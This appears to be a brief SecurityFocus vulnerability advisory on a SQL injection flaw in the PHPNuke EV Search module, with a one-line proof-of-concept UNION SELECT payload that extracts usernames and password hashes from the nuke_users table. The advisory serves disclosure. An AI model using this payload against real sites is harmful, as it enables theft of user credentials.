PHPNuke EV Search Module SQL Injection Vulnerability

No exploit is required.

Example proof-of-concept code has been provided:


navigate to http://www.example.com/modules.php?name=Search and type in

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus